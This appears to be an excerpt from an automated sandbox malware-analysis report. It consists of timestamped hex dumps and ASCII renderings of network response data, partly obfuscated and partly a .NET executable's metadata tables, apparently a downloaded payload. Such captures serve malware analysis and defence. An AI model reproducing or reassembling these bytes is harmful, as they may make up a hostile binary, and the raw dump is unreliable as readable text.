                                                                                                                                                                                                          Data Ascii: CThyVutO$Rps\AqqCRv~^z9PYQkpu_SvQSSkwru_~9PYQiA@pY,VwQYWCRsxVq}Skwru_QdwQ_8Sps]QsuQ_@pu[\@YWEXYyPXWEVXP[yP`WCPUc*VwWRps6WwWsWCRkE_y@vQY}CRayV}[[8DSpRAwQYP,ZquSu^6XWE=ytYs[OYWC[Xy\dUQ8&Sps+uUw!HS,qu_QwQSRp*Vw[HS,
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC934INData Raw: 16 1c 77 51 53 72 6e 56 56 61 72 7c 39 3c 51 59 5d 2c 6e 70 75 53 a7 55 51 8f 59 5e 2c 1e 70 75 53 54 c1 a9 5b 50 7b 45 5b 1f 76 59 79 5c ab 8f 53 5f 6f 54 78 1a 5a 79 56 7d 8d 87 5d 44 7e 76 72 36 7a 56 77 5b 85 89 40 74 ae 75 5f 53 56 77 50 19 57 43 52 70 2a 59 28 e6 77 52 5a 57 43 53 72 75 09 79 3b ca 51 53 57 43 52 70 77 59 30 56 f7 98 59 5d 43 52 70 75 5b 79 14 77 c2 8c 57 49 52 70 75 59 79 56 71 51 82 b6 43 51 73 75 59 78 4d 47 54 59 09 42 52 70 2c 59 79 47 04 63 59 57 49 58 6f 46 d4 3e 56 77 50 7c 87 46 53 70 71 71 fc 56 77 5b 2a 7b 43 52 7a 7e 27 cd 57 77 5b 5e 38 6e 53 70 7f 55 71 39 c2 50 59 5d 4e 44 63 71 61 a6 56 77 51 50 46 47 c8 63 70 51 68 53 18 7c 58 57 49 41 76 64 5f 54 55 63 7a 47 46 45 4d 7b f8 1e 79 56 76 74 89 77 42 52 74 5d dc 79 56
                                                                                                                                                                                                          Data Ascii: wQSrnVVar|9<QY],npuSUQY^,puST[P{E[vYy\S_oTxZyV}]D~vr6zVw[@tu_SVwPWCRp*Y(wRZWCSruy;QSWCRpwY0VY]CRpu[ywWIRpuYyVqQCQsuYxMGTYBRp,YyGcYWIXoF>VwP|FSpqqVw[*{CRz~'Ww[^8nSpUq9PY]NDcqaVwQPFGcpQhS|XWIAvd_TUczGFEM{yVvtwBRt]yV
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC950INData Raw: ce 7d 52 50 77 59 04 10 77 51 5a 57 1a 10 70 75 5d 79 06 35 51 59 52 43 c0 4f 75 59 7f 56 2b 6b 59 57 42 52 e9 4b 59 59 54 77 2c 1f 57 43 51 70 2c 1b 79 56 73 51 09 15 43 52 75 75 cb 46 56 77 57 59 0b 79 52 70 72 59 af 7d 77 51 51 57 89 6c 70 75 58 79 c4 48 51 59 55 43 ee 4f 75 59 78 56 bd 6f 59 57 41 52 d6 6b 59 79 57 77 c8 67 57 63 50 70 08 1f 79 56 74 51 1b 15 43 52 74 75 63 3b 56 77 54 59 03 79 52 70 74 59 e0 68 77 71 5b 57 3e 14 70 75 5a 79 14 35 51 59 53 43 68 32 75 59 7c 56 23 6b 59 57 45 52 a6 5e 59 79 51 77 9b 67 57 43 53 70 c9 66 79 56 76 51 93 69 43 52 72 75 ff 67 56 77 50 59 fd 6e 52 70 77 59 6b 12 77 71 5a 57 3d 71 72 75 5d 79 57 33 51 59 52 43 ec 4e 75 59 7f 56 c5 6f 59 57 44 52 32 37 59 79 5e 77 6b 1b 57 43 5b 70 21 63 79 56 76 51 f3 7a 43
                                                                                                                                                                                                          Data Ascii: }RPwYwQZWpu]y5QYRCOuYV+kYWBRKYYTw,WCQp,yVsQCRuuFVwWYyRprY}wQQWlpuXyHQYUCOuYxVoYWARkYyWwgWcPpyVtQCRtuc;VwTYyRptYhwq[W>puZy5QYSCh2uY|V#kYWER^YyQwgWCSpfyVvQiCRrugVwPYnRpwYkwqZW=qru]yW3QYRCNuYVoYWDR27Yy^wkWC[p!cyVvQzC
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC966INData Raw: 2a 1c 22 28 18 3d 66 75 52 35 1b 2d 10 22 0e 60 6f 57 77 63 40 31 6c 4c 67 35 17 60 13 00 63 36 45 1a 3f 64 41 63 1c 63 07 10 41 45 6e 4e 61 4e 64 1d 62 75 17 35 36 69 4b 60 77 14 69 14 06 10 43 30 6d 4f 13 4f 64 6e 16 74 62 33 33 1b 4c 61 42 10 69 62 01 62 41 34 6f 4d 6e 47 67 18 6f 07 66 42 43 59 26 09 24 25 38 23 2a 31 31 07 2b 18 2f 3e 3f 30 23 17 2b 00 10 0a 10 2c 12 6c 6d 61 43 0d 2f 26 2d 18 22 1e 32 18 25 31 33 09 3c 37 10 22 23 28 29 32 10 3b 0a 10 64 4e 60 77 0e 06 04 37 33 04 1c 3a 38 24 05 30 20 1e 2d 3b 04 21 20 09 33 24 38 23 32 7e 61 48 4c 6f 79 09 28 02 2d 36 37 3b 13 34 2b 0b 37 0e 18 37 3e 37 06 09 05 3c 2a 3f 0d 34 64 61 43 6a 40 30 6c 38 66 36 63 1b 6f 72 16 32 47 6d 4e 65 36 17 1b 15 70 14 34 31 6f 3f 62 40 68 6f 60 73 10 47 37 6d 48
                                                                                                                                                                                                          Data Ascii: *"(=fuR5-"`oWwc@1lLg5`c6E?dAccAEnNaNdbu56iK`wiC0mOOdntb33LaBibbA4oMnGgofBCY&$%8#*11+/>?0#+,lmaC/&-"2%13<7"#()2;dN`w73:8$0 -;! 3$8#2~aHLoy(-67;4+77>7<*?4daCj@0l8f6cor2GmNe6p41o?b@ho`sG7mH
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC982INData Raw: 43 3d 70 05 59 1c 56 31 51 30 57 2f 52 15 75 10 79 38 77 37 59 38 43 20 70 14 59 59 56 30 51 1f 57 2a 52 1c 75 3c 79 1f 77 3f 59 31 43 3d 70 2d 59 59 56 24 51 2d 57 22 52 12 75 1f 79 3f 77 3d 59 32 43 1b 70 1b 59 1f 56 18 51 35 57 26 52 70 64 1f 79 3f 77 3d 59 32 43 1b 70 1b 59 1f 56 18 51 59 76 0c 52 00 75 15 79 3f 77 3f 59 26 43 37 70 07 59 18 56 57 51 1e 57 0f 52 19 75 37 79 27 77 09 59 57 4a 1e 70 1c 59 17 56 06 51 59 0c 63 52 31 75 29 79 11 77 34 59 39 43 37 70 07 59 10 56 14 51 29 57 07 52 11 75 1e 79 33 77 3f 59 32 43 20 70 1c 59 1a 56 03 51 38 57 1f 52 22 75 1e 79 33 77 3f 59 32 43 20 70 1c 59 1a 56 18 51 38 57 2e 52 19 75 1e 79 33 77 3f 59 32 43 20 70 1c 59 1a 56 19 51 3e 57 1f 52 70 64 79 79 18 77 34 59 23 43 25 70 1a 59 0b 56 1c 51 59 42 63 52
                                                                                                                                                                                                          Data Ascii: C=pYV1Q0W/Ruy8w7Y8C pYYV0QW*Ru<yw?Y1C=p-YYV$Q-W"Ruy?w=Y2CpYVQ5W&Rpdy?w=Y2CpYVQYvRuy?w?Y&C7pYVWQWRu7y'wYWJpYVQYcR1u)yw4Y9C7pYVQ)WRuy3w?Y2C pYVQ8WR"uy3w?Y2C pYVQ8W.Ruy3w?Y2C pYVQ>WRpdyyw4Y#C%pYVQYBcR
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC998INData Raw: 00 23 53 74 72 69 6e 67 73 00 00 00 00 28 ed 07 00 e8 26 00 00 23 55 53 00 10 14 08 00 00 00 00 00 23 47 55 49 44 00 00 00 10 14 08 00 3c 0a 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 01 01 01 01 57 d5 b6 29 09 0f 00 00 00 fa 25 33 00 16 00 00 01 00 00 00 6d 00 00 00 2e 00 00 00 8e 00 00 00 3b 46 00 00 93 00 00 00 b7 00 00 00 23 00 00 00 01 00 00 00 01 00 00 00 13 00 00 00 08 00 00 00 08 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 28 00 00 00 01 00 00 00 01 00 00 00 07 00 00 00 03 00 00 00 24 00 00 00 04 00 00 00 14 00 00 00 00 00 82 d6 02 00 00 00 00 00 00 00 06 00 97 9c 00 00 5e b2 00 00 06 00 8e ae 00 00 34 a3 00 00 0a 00 22 13 00 00 5b ab 00 00 06 00 10 33 00 00 34 a3 00 00 0a 00 2a 9c 00 00 5b ab 00 00 06 00 91 41 00 00 34 a3 00 00 06 00 51 9b 00 00
                                                                                                                                                                                                          Data Ascii: #Strings(&#US#GUID<#BlobW)%3m.;F#($^4"[34*[A4Q
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1014INData Raw: 00 91 00 12 31 03 00 18 00 02 00 88 25 00 00 00 00 91 00 f2 f8 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 30 17 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 0a 22 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 d3 9c 02 00 18 00 02 00 88 25 00 00 00 00 91 00 53 65 03 00 18 00 02 00 88 25 00 00 00 00 91 00 fa ab 01 00 18 00 02 00 88 25 00 00 00 00 91 00 d5 64 02 00 18 00 02 00 88 25 00 00 00 00 91 00 ca 63 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 50 29 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 31 c2 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 ee 22 01 00 18 00 02 00 88 25 00 00 00 00 91 00 44 15 00 00 18 00 02 00 88 25 00 00 00 00 91 00 b8 26 02 00 18 00 02 00 88 25 00 00 00 00 91 00 53 d3 01 00 18 00 02 00 88 25 00 00 00 00 91 00 bf 66 03 00 18 00 02 00 88 25 00 00
                                                                                                                                                                                                          Data Ascii: 1%%0%"%%Se%%d%c%P)%1%"%D%&%S%f%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1030INData Raw: 00 91 00 3c 92 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 66 3d 03 00 18 00 02 00 88 25 00 00 00 00 91 00 3b ec 01 00 18 00 02 00 88 25 00 00 00 00 91 00 a8 4d 00 00 18 00 02 00 88 25 00 00 00 00 91 00 d8 4a 01 00 18 00 02 00 88 25 00 00 00 00 91 00 3c 74 00 00 18 00 02 00 88 25 00 00 00 00 91 00 0d c4 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 c4 ce 00 00 18 00 02 00 88 25 00 00 00 00 91 00 71 2d 01 00 18 00 02 00 88 25 00 00 00 00 91 00 21 6e 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 8f ff 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 3b 0f 01 00 18 00 02 00 88 25 00 00 00 00 91 00 ce 05 01 00 18 00 02 00 88 25 00 00 00 00 91 00 f6 cc 00 00 18 00 02 00 88 25 00 00 00 00 91 00 a7 6e 01 00 18 00 02 00 88 25 00 00 00 00 91 00 72 6b 01 00 18 00 02 00 a0 25 00 00
                                                                                                                                                                                                          Data Ascii: <%f=%;%M%J%<t%%%q-%!n%%;%%%n%rk%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1046INData Raw: 18 00 02 00 a0 25 00 00 00 00 91 00 6d f6 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 22 fc 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 8f 45 02 00 18 00 02 00 88 25 00 00 00 00 91 00 48 06 01 00 18 00 02 00 88 25 00 00 00 00 91 00 3c 1a 00 00 18 00 02 00 88 25 00 00 00 00 91 00 51 1d 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 c2 8e 00 00 18 00 02 00 88 25 00 00 00 00 91 00 72 05 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 ae f7 01 00 18 00 02 00 88 25 00 00 00 00 91 00 7e 50 01 00 18 00 02 00 88 25 00 00 00 00 91 00 8e ee 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 82 41 01 00 18 00 02 00 88 25 00 00 00 00 91 00 2c 53 01 00 18 00 02 00 88 25 00 00 00 00 91 00 b8 ba 02 00 18 00 02 00 88 25 00 00 00 00 91 00 53 bc 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 59 28 02
                                                                                                                                                                                                          Data Ascii: %m%"%E%H%<%Q%%r%%~P%%A%,S%%S%Y(
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1062INData Raw: 18 00 02 00 88 25 00 00 00 00 91 00 b4 77 02 00 18 00 02 00 88 25 00 00 00 00 91 00 e9 1f 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 89 e8 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 7d f8 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 5d 3a 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 4a c0 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 0d 15 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 aa 45 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 18 a0 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 6c 58 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 65 fe 02 00 18 00 02 00 88 25 00 00 00 00 91 00 56 07 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 d5 69 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 63 21 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 06 27 00 00 18 00 02 00 88 25 00 00 00 00 91 00 fc cc 02
                                                                                                                                                                                                          Data Ascii: %w%%%}%]:%J%%E%%lX%e%V%i%c!%'%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1078INData Raw: 18 00 02 00 a0 25 00 00 00 00 91 00 e7 4b 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 59 ce 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 1c 88 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 2b 29 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 0f 60 02 00 18 00 02 00 88 25 00 00 00 00 91 00 02 fe 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 9f fa 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 d1 62 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 8b 1c 02 00 18 00 02 00 88 25 00 00 00 00 91 00 53 cb 02 00 18 00 02 00 88 25 00 00 00 00 91 00 c3 32 02 00 18 00 02 00 88 25 00 00 00 00 91 00 2b 93 01 00 18 00 02 00 88 25 00 00 00 00 91 00 01 1a 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 f9 dd 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 14 52 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 3e b7 01
                                                                                                                                                                                                          Data Ascii: %K%Y%%+)%`%%%b%%S%2%+%%%R%>
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1094INData Raw: 18 00 02 00 a0 25 00 00 00 00 91 00 82 73 00 00 18 00 02 00 88 25 00 00 00 00 91 00 06 6b 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 1b df 00 00 18 00 02 00 88 25 00 00 00 00 91 00 7b 11 02 00 18 00 02 00 88 25 00 00 00 00 91 00 23 05 01 00 18 00 02 00 88 25 00 00 00 00 91 00 b6 5d 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 1b b0 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 c2 28 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 1f e1 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 af a3 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 45 93 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 79 81 02 00 18 00 02 00 88 25 00 00 00 00 91 00 bb 3c 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 cd c6 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 17 fa 02 00 18 00 02 00 88 25 00 00 00 00 91 00 e1 19 02
                                                                                                                                                                                                          Data Ascii: %s%k%%{%#%]%%(%%%E%y%<%%%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1110INData Raw: 00 00 00 91 00 d7 08 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 b3 bf 02 00 18 00 02 00 88 25 00 00 00 00 91 00 f7 a4 01 00 18 00 02 00 88 25 00 00 00 00 91 00 34 1e 02 00 18 00 02 00 88 25 00 00 00 00 91 00 46 50 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 09 e4 01 00 18 00 02 00 88 25 00 00 00 00 91 00 2b df 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 68 42 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 f4 e9 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 37 84 00 00 18 00 02 00 88 25 00 00 00 00 91 00 88 e2 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 6f ed 00 00 18 00 02 00 88 25 00 00 00 00 91 00 3a 17 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 15 8a 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 a4 e3 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 3f f8 00 00 18 00 02 00 88 25
                                                                                                                                                                                                          Data Ascii: %%%4%FP%%+%hB%%7%%o%:%%%?%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1126INData Raw: 00 00 00 91 00 21 92 01 00 18 00 02 00 88 25 00 00 00 00 91 00 a3 6c 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 f0 1a 00 00 18 00 02 00 88 25 00 00 00 00 91 00 c8 64 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 bc 1d 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 35 b9 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 15 1f 02 00 18 00 02 00 88 25 00 00 00 00 91 00 bc 37 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 29 48 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 f6 d8 01 00 18 00 02 00 88 25 00 00 00 00 91 00 95 e7 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 31 22 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 8f f9 00 00 18 00 02 00 88 25 00 00 00 00 91 00 7d 1e 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 01 15 01 00 18 00 02 00 88 25 00 00 00 00 91 00 66 a1 02 00 18 00 02 00 a0 25
                                                                                                                                                                                                          Data Ascii: !%l%%d%%5%%7%)H%%%1"%%}%%f%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1142INData Raw: 00 00 00 91 00 59 7b 01 00 18 00 02 00 88 25 00 00 00 00 91 00 64 2d 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 66 ad 02 00 18 00 02 00 88 25 00 00 00 00 91 00 c9 ce 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 a8 e9 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 ec cb 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 d8 71 01 00 18 00 02 00 88 25 00 00 00 00 91 00 b0 e3 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 05 90 00 00 18 00 02 00 88 25 00 00 00 00 91 00 ab f3 00 00 18 00 02 00 88 25 00 00 00 00 91 00 15 09 02 00 18 00 02 00 88 25 00 00 00 00 91 00 2d 7e 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 12 19 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 21 c2 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 6d b2 02 00 18 00 02 00 88 25 00 00 00 00 91 00 4d 13 01 00 18 00 02 00 88 25
                                                                                                                                                                                                          Data Ascii: Y{%d-%f%%%%q%%%%%-~%%!%m%M%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1158INData Raw: 00 00 00 91 00 bc ad 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 bb e6 01 00 18 00 02 00 88 25 00 00 00 00 91 00 78 79 02 00 18 00 02 00 88 25 00 00 00 00 91 00 5d 49 01 00 18 00 02 00 88 25 00 00 00 00 91 00 ef 2f 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 5c bb 02 00 18 00 02 00 88 25 00 00 00 00 91 00 83 d9 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 eb 20 00 00 18 00 02 00 88 25 00 00 00 00 91 00 ff 2d 02 00 18 00 02 00 88 25 00 00 00 00 91 00 a7 f6 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 19 cc 00 00 18 00 02 00 88 25 00 00 00 00 91 00 c7 e7 00 00 18 00 02 00 88 25 00 00 00 00 91 00 98 59 03 00 18 00 02 00 88 25 00 00 00 00 91 00 92 8a 02 00 18 00 02 00 88 25 00 00 00 00 91 00 13 ec 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 35 7a 01 00 18 00 02 00 a0 25
                                                                                                                                                                                                          Data Ascii: %%xy%]I%/%\%% %-%%%%Y%%%5z%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1174INData Raw: 01 00 18 00 02 00 88 25 00 00 00 00 91 00 5a 31 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 3b 7e 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 6d cf 00 00 18 00 02 00 88 25 00 00 00 00 91 00 8d 54 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 db 87 01 00 18 00 02 00 88 25 00 00 00 00 91 00 c0 e1 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 9e c3 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 19 28 01 00 18 00 02 00 88 25 00 00 00 00 91 00 e9 2e 01 00 18 00 02 00 88 25 00 00 00 00 91 00 1e db 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 6e b8 00 00 18 00 02 00 88 25 00 00 00 00 91 00 14 de 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 e1 11 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 e7 ca 01 00 18 00 02 00 88 25 00 00 00 00 91 00 41 06 02 00 18 00 02 00 88 25 00 00 00 00 91 00 b9
                                                                                                                                                                                                          Data Ascii: %Z1%;~%m%T%%%%(%.%%n%%%%A%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1190INData Raw: 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 84 48 02 00 18 00 02 00 88 25 00 00 00 00 91 00 16 2a 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 de 30 03 00 18 00 02 00 88 25 00 00 00 00 91 00 99 81 02 00 18 00 02 00 88 25 00 00 00 00 91 00 62 1b 01 00 18 00 02 00 88 25 00 00 00 00 91 00 71 3d 00 00 18 00 02 00 88 25 00 00 00 00 91 00 c8 bd 01 00 18 00 02 00 88 25 00 00 00 00 91 00 e4 44 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 af 04 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 1c ff 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 5b 29 00 00 18 00 02 00 88 25 00 00 00 00 91 00 3c 45 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 f3 14 01 00 18 00 02 00 88 25 00 00 00 00 91 00 c7 cf 01 00 18 00 02 00 88 25 00 00 00 00 91 00 42 4f 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 31
                                                                                                                                                                                                          Data Ascii: %H%*%0%%b%q=%%D%%%[)%<E%%%BO%1
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1206INData Raw: 00 00 18 00 02 00 88 25 00 00 00 00 91 00 48 f7 01 00 18 00 02 00 88 25 00 00 00 00 91 00 8e 21 02 00 18 00 02 00 88 25 00 00 00 00 91 00 f4 16 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 06 31 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 97 6a 00 00 18 00 02 00 88 25 00 00 00 00 91 00 fe 81 02 00 18 00 02 00 88 25 00 00 00 00 91 00 f4 00 00 00 18 00 02 00 88 25 00 00 00 00 91 00 d8 92 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 3b 79 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 0b 8e 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 b9 dd 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 35 ba 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 24 1b 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 3b 76 00 00 18 00 02 00 88 25 00 00 00 00 91 00 7d d1 02 00 18 00 02 00 88 25 00 00 00 00 91 00 5d
                                                                                                                                                                                                          Data Ascii: %H%!%%1%j%%%%;y%%%5%$%;v%}%]
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1222INData Raw: 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 db 72 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 bf c4 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 ad 39 01 00 18 00 02 00 88 25 00 00 00 00 91 00 31 f4 02 00 18 00 02 00 88 25 00 00 00 00 91 00 5a 22 00 00 18 00 02 00 88 25 00 00 00 00 91 00 da 36 03 00 18 00 02 00 88 25 00 00 00 00 91 00 2f 31 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 67 95 00 00 18 00 02 00 88 25 00 00 00 00 91 00 15 a0 02 00 18 00 02 00 88 25 00 00 00 00 91 00 34 56 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 99 90 02 00 18 00 02 00 88 25 00 00 00 00 91 00 da e2 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 89 6b 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 d2 4b 03 00 18 00 02 00 a0 25 00 00 00 00 91 00 e0 54 02 00 18 00 02 00 88 25 00 00 00 00 91 00 a6
                                                                                                                                                                                                          Data Ascii: %r%%9%1%Z"%6%/1%g%%4V%%%k%K%T%
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1238INData Raw: 25 00 00 00 00 91 00 7f b3 00 00 18 00 02 00 88 25 00 00 00 00 91 00 4b b7 01 00 18 00 02 00 88 25 00 00 00 00 91 00 b8 e7 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 51 00 03 00 18 00 02 00 88 25 00 00 00 00 91 00 5a e1 01 00 18 00 02 00 88 25 00 00 00 00 91 00 5c 13 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 8f d8 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 4a 8e 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 a2 54 00 00 18 00 02 00 88 25 00 00 00 00 91 00 23 0b 00 00 18 00 02 00 88 25 00 00 00 00 91 00 cf a8 01 00 18 00 02 00 88 25 00 00 00 00 91 00 a3 1a 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 94 3e 00 00 18 00 02 00 88 25 00 00 00 00 91 00 73 0b 03 00 18 00 02 00 88 25 00 00 00 00 91 00 82 47 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 4e 2c 00 00 18 00 02 00
                                                                                                                                                                                                          Data Ascii: %%K%%Q%Z%\%%J%T%#%%%>%s%G%N,
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1254INData Raw: 25 00 00 00 00 91 00 10 b9 02 00 18 00 02 00 88 25 00 00 00 00 91 00 d9 21 01 00 18 00 02 00 88 25 00 00 00 00 91 00 d3 ff 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 3d 8d 01 00 18 00 02 00 88 25 00 00 00 00 91 00 f4 59 02 00 18 00 02 00 88 25 00 00 00 00 91 00 cd 4a 03 00 18 00 02 00 88 25 00 00 00 00 91 00 a2 73 02 00 18 00 02 00 88 25 00 00 00 00 91 00 2b 21 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 8e 06 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 a2 09 03 00 18 00 02 00 88 25 00 00 00 00 91 00 e0 3d 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 2a 59 01 00 18 00 02 00 a0 25 00 00 00 00 91 00 0e 78 00 00 18 00 02 00 a0 25 00 00 00 00 91 00 b5 43 02 00 18 00 02 00 a0 25 00 00 00 00 91 00 ea 0e 02 00 18 00 02 00 88 25 00 00 00 00 91 00 fb 57 00 00 18 00 02 00
                                                                                                                                                                                                          Data Ascii: %%!%%=%Y%J%s%+!%%%=%*Y%x%C%%W
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1270INData Raw: 25 00 00 00 00 91 00 9c aa 02 00 18 00 12 00 88 25 00 00 00 00 91 00 f4 45 01 00 18 00 12 00 88 25 00 00 00 00 91 00 c7 38 00 00 18 00 12 00 a0 25 00 00 00 00 91 00 6f 29 03 00 18 00 12 00 88 25 00 00 00 00 91 00 38 f6 00 00 18 00 12 00 88 25 00 00 00 00 91 00 5f c4 00 00 18 00 12 00 88 25 00 00 00 00 91 00 ee 8e 01 00 18 00 12 00 88 25 00 00 00 00 91 00 73 e3 02 00 18 00 12 00 88 25 00 00 00 00 91 00 a9 f8 02 00 18 00 12 00 a0 25 00 00 00 00 91 00 e7 f6 01 00 18 00 12 00 a0 25 00 00 00 00 91 00 6d 0f 00 00 18 00 12 00 a0 25 00 00 00 00 91 00 ee 2d 00 00 18 00 12 00 88 25 00 00 00 00 91 00 23 90 01 00 18 00 12 00 a0 25 00 00 00 00 91 00 97 36 01 00 18 00 12 00 a0 25 00 00 00 00 91 00 1b 9a 02 00 18 00 12 00 88 25 00 00 00 00 91 00 bb b3 01 00 18 00 12 00
                                                                                                                                                                                                          Data Ascii: %%E%8%o)%8%_%%s%%%m%-%#%6%%
